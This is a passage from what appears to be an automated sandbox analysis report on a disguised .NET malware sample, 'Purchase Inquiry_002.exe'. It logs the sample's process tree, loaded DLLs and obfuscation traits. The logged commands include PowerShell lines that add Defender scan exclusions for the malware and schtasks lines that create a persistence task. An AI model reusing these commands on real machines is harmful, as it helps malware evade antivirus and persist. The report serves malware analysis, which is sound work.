            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeMutant created: \Sessions\1\BaseNamedObjects\PByueLbLyolhtCqZ
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3EA3.tmpJump to behavior
            Source: Purchase Inquiry_002.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Purchase Inquiry_002.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Purchase Inquiry_002.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeFile read: C:\Users\user\Desktop\Purchase Inquiry_002.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Purchase Inquiry_002.exe "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Users\user\Desktop\Purchase Inquiry_002.exe "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess created: C:\Users\user\Desktop\Purchase Inquiry_002.exe "C:\Users\user\Desktop\Purchase Inquiry_002.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeProcess created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Purchase Inquiry_002.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Purchase Inquiry_002.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Purchase Inquiry_002.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: zJGj.pdb source: Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.dr
            Source: Binary string: zJGj.pdbSHA2567 source: Purchase Inquiry_002.exe, xASiLfzXONGIW.exe.0.dr

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, oAHMyelsBlebo17c9D.cs.Net Code: WPcMBjNRrc System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, oAHMyelsBlebo17c9D.cs.Net Code: WPcMBjNRrc System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041A8DA
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 9_2_0314F448 push ebp; retf 9_2_0314F44A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004000D8 push es; iretd 14_2_004000D9
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040008C push es; iretd 14_2_0040008D
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004542E6 push ecx; ret 14_2_004542F9
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0045B4FD push esi; ret 14_2_0045B506
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00432BD6 push ecx; ret 14_2_00432BE9
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00454C08 push eax; ret 14_2_00454C26
            Source: Purchase Inquiry_002.exeStatic PE information: section name: .text entropy: 7.966548982352114
            Source: xASiLfzXONGIW.exe.0.drStatic PE information: section name: .text entropy: 7.966548982352114
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, KrxB0FGnmZKpkyNbXX.csHigh entropy of concatenated method names: 'vsPBtrBGW', 'xJtEdwoJR', 'yQdgnS2yA', 'ocp8OY3DT', 'rW1sYqSkA', 'PaM3cQKJf', 'Opme0mhLgXvl11dZ7F', 'MwMQuhZrXX7jyjJlPl', 'vARVc4f2M', 'Gw2Xv2ygC'
